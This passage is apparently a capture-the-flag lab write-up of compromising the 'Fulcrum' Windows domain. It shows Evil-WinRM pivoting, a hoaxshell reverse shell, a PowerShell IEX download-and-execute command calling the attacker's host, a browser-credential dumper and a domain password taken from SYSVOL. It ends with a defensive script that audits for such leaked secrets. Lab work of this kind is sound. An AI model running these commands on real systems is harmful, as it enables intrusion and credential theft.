*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ipconfig /all }

Windows IP Configuration

   Host Name . . . . . . . . . . . . : FILE
   Primary Dns Suffix . . . . . . . : fulcrum.local
   Node Type . . . . . . . . . . . . : Hybrid
   IP Routing Enabled. . . . . . . . : No
   WINS Proxy Enabled. . . . . . . . : No
   DNS Suffix Search List. . . . . . : fulcrum.local

Ethernet adapter Ethernet:

   Connection-specific DNS Suffix . :
   Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
   Physical Address. . . . . . . . . : 52-54-00-9E-52-F3
   DHCP Enabled. . . . . . . . . . . : Yes
   Autoconfiguration Enabled . . . . : Yes
   Link-local IPv6 Address . . . . . : fe80::7951:5c86:6630:5e64%3(Preferred)
   IPv4 Address. . . . . . . . . . . : 192.168.122.132(Preferred)
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Lease Obtained. . . . . . . . . . : Saturday, September 3, 2022 12:29:10 AM
   Lease Expires . . . . . . . . . . : Saturday, September 3, 2022 4:43:37 AM
   Default Gateway . . . . . . . . . : 192.168.122.1
   DHCP Server . . . . . . . . . . . : 192.168.122.1
   DHCPv6 IAID . . . . . . . . . . . : 106058752
   DHCPv6 Client DUID. . . . . . . . : 00-01-00-01-2A-09-35-75-52-54-00-9E-52-F3
   DNS Servers . . . . . . . . . . . : 192.168.122.130
                                       1.1.1.1
   NetBIOS over Tcpip. . . . . . . . : Enabled
*Evil-WinRM* PS C:\inetpub\wwwroot>

I can test whether it can reach the Linux host I have already taken over:

root@fulcrum:~# tcpdump -I virbr0 -w test.pcap
tcpdump: virbr0: That device doesn't support monitor mode
root@fulcrum:~# tcpdump -i virbr0 -w test.pcap
tcpdump: listening on virbr0, link-type EN10MB (Ethernet), capture size 262144 bytes
*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ping 192.168.122.1 }

Pinging 192.168.122.1 with 32 bytes of data:
Reply from 192.168.122.1: bytes=32 time<1ms TTL=64
Reply from 192.168.122.1: bytes=32 time=2ms TTL=64
Reply from 192.168.122.1: bytes=32 time<1ms TTL=64
Reply from 192.168.122.1: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.122.1:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 2ms, Average = 0ms
*Evil-WinRM* PS C:\inetpub\wwwroot>

Can it reach the outside network?

*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { ping 10.10.16.3 }

Pinging 10.10.16.3 with 32 bytes of data:
Reply from 10.10.16.3: bytes=32 time=259ms TTL=62
Reply from 10.10.16.3: bytes=32 time=562ms TTL=62
Reply from 10.10.16.3: bytes=32 time=140ms TTL=62
Reply from 10.10.16.3: bytes=32 time=297ms TTL=62

Ping statistics for 10.10.16.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 140ms, Maximum = 562ms, Average = 314ms
*Evil-WinRM* PS C:\inetpub\wwwroot>

It can. Good, so I can get a reverse PowerShell shell directly:

*Evil-WinRM* PS C:\inetpub\wwwroot> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { powershell -e 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 }
CrazyInSide:~/Toolbox/hoaxshell$ python3 hoaxshell.py -s 10.10.16.3
[hoaxshell banner] by t3l3machus

[Info] Generating reverse shell payload...
powershell -e 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
[Info] Type "help" to get a list of the available prompt commands.
[Info] Http Server started on port 8080.
[Important] Awaiting payload execution to initiate shell session...
[Shell] Payload execution verified!
[Shell] Stabilizing command prompt...
PS C:\Users\BTables\Documents> whoami
fulcrum\btables
PS C:\Users\BTables\Documents>

Finally, user.txt:

PS C:\Users\BTables> cd Desktop

PS C:\Users\BTables\Desktop> ls


    Directory: C:\Users\BTables\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        5/8/2022   1:48 AM             32 user.txt


PS C:\Users\BTables\Desktop> cat user.txt
fc......................................

The user's privileges are nothing special, so I start by collecting passwords:

PS C:\Users\BTables\Downloads> copy \\10.10.16.3\share\hack-browser-data-windows-64bit.exe .

PS C:\Users\BTables\Downloads> ls


    Directory: C:\Users\BTables\Downloads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/2/2022   8:58 PM        8162816 hack-browser-data-windows-64bit.exe

PS C:\Users\BTables\Downloads> .\hack-browser-data-windows-64bit.exe -b all -f json --dir results -zip

Nothing at all:

[NOTICE] [browser.go:47,pickChromium] find browser Chrome Beta failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser OperaGX failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Vivaldi failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser CocCoc failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser QQ failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Chrome failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Microsoft Edge failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Chromium failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Opera failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Brave failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser Yandex failed, profile folder does not exist
[NOTICE] [browser.go:47,pickChromium] find browser 360speed failed, profile folder does not exist
[NOTICE] [browser.go:91,pickFirefox] find browser firefox Firefox failed, profile folder does not exist
[ERROR] [main.go:66,func1] open results: The system cannot find the file specified.
[NOTICE] [main.go:68,func1] compress success

The shares are only the default ones as well:

PS C:\Users\BTables\Downloads> Get-SMBShare
[Important] Session has been idle for more than 10.8 seconds. Shell probably died.

Name   ScopeName Path Description
----   --------- ---- -----------
ADMIN$ *              Remote Admin
C$     *              Default share
IPC$   *              Remote IPC

PS C:\Users\BTables\Downloads>

This kind of shell is not very usable; it crashed. I try to locate the domain controller:

*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { nslookup dc.fulcrum.local }
Server:  DC
Address:  192.168.122.130

Name:    dc.fulcrum.local
Address:  192.168.122.130

*Evil-WinRM* PS C:\Users\WebUser\Documents>

It seems only that FILE machine can reach the domain controller:

root@fulcrum:~# nc -zv 192.168.122.130 445

The shell called back:

*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -ComputerName file.fulcrum.local -Credential $btcred -ScriptBlock { powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.16.3:80/a'))" }

There are two shares on the domain controller, and SYSVOL contains a great many PowerShell scripts:

Searching through them turns up the credential of user 923a:

*Evil-WinRM* PS C:\Users\WebUser\Documents> $pass = ConvertTo-SecureString '@fulcrum_bf392748ef4e_$' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\WebUser\Documents> $cred = New-Object System.Management.Automation.PSCredential('FULCRUM\923a', $pass)
*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -Computer dc.fulcrum.local -Credential $cred -scriptblock { whoami}
fulcrum\923a
*Evil-WinRM* PS C:\Users\WebUser\Documents> Invoke-Command -Computer dc.fulcrum.local -Credential $cred -scriptblock { cat \users\administrator\desktop\root.txt }
8d.....................................
*Evil-WinRM* PS C:\Users\WebUser\Documents>
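Both footholds on this box come from the same mistake: a password written into the info attribute of a user object, and plaintext credentials left in scripts under SYSVOL. As an added audit example (my own, not part of the original writeup or of any tool it uses), the script below checks a domain for exactly these two conditions. It reuses the [adsisearcher] technique from the LDAP dump above; the SYSVOL path built from $env:USERDNSDOMAIN, the attribute list and the regular expression are my assumptions and should be tuned to the domain being audited. It is meant to be run by an administrator from a domain-joined host with read access to the directory and to the SYSVOL share.

```powershell
# Added audit example, not from the original writeup. Assumptions: run on a
# domain-joined Windows host; the caller can read user objects and SYSVOL;
# the SYSVOL path and the regex are illustrative and should be tuned.

# Strings that usually mean a secret was written where it does not belong:
#  - "Password set to ...", "password: ...", "pwd=..." in free-text attributes
#  - ConvertTo-SecureString '<literal>' ... -AsPlainText inside a script
#  - New-Object PSCredential(...) built from an inline secret inside a script
$SecretPattern = 'pass(word|wd)?\s*(set to|is|:|=)|' +
                 'ConvertTo-SecureString\s+(-String\s+)?[''"][^''"]+[''"].*-AsPlainText|' +
                 'PSCredential\s*\('

function Find-AdAttributeSecrets {
    # Walks every user object with the same [adsisearcher] approach used in the
    # writeup and reports free-text attributes that match $SecretPattern.
    param([string]$LdapFilter = '(&(objectCategory=person)(objectClass=user))')

    $searcher = [adsisearcher]$LdapFilter
    $searcher.PageSize = 1000                       # paged search: scales past 1000 users
    $textAttrs = 'description', 'info', 'comment'   # fields admins misuse for notes
    foreach ($a in @('samaccountname') + $textAttrs) {
        [void]$searcher.PropertiesToLoad.Add($a)
    }

    foreach ($result in $searcher.FindAll()) {
        $account = @($result.Properties['samaccountname']) -join ''
        foreach ($attr in $textAttrs) {
            # A missing attribute comes back as an empty collection, so -join yields ''.
            $value = @($result.Properties[$attr]) -join ' '
            if ($value -and $value -match $SecretPattern) {
                [pscustomobject]@{ Account = $account; Attribute = $attr; Value = $value }
            }
        }
    }
}

function Find-SysvolSecrets {
    # Greps logon/startup scripts and GPO files in SYSVOL for the same patterns.
    param(
        # Assumed default: the domain's SYSVOL share, e.g. \\fulcrum.local\SYSVOL\fulcrum.local
        [string]$Path = "\\$env:USERDNSDOMAIN\SYSVOL\$env:USERDNSDOMAIN"
    )
    Get-ChildItem -Path $Path -Recurse -File -ErrorAction SilentlyContinue `
                  -Include *.ps1, *.bat, *.cmd, *.vbs, *.xml |
        Select-String -Pattern $SecretPattern -AllMatches |
        ForEach-Object {
            [pscustomobject]@{ File = $_.Path; Line = $_.LineNumber; Text = $_.Line.Trim() }
        }
}

# Run both checks. Every hit is a credential to rotate and a location to clean,
# then the attribute or script should be fixed so the secret is not put back.
Find-AdAttributeSecrets | Format-Table -AutoSize
Find-SysvolSecrets      | Format-Table -AutoSize
```

On this box the first function would flag BTables (info contains "Password set to ..."), and the second would flag any SYSVOL script that builds a PSCredential from a literal, which is how the 923a password was exposed. The description, info and comment attributes are readable by every authenticated domain user, and SYSVOL is readable by every domain member, so neither place is acceptable for a secret regardless of who wrote it there.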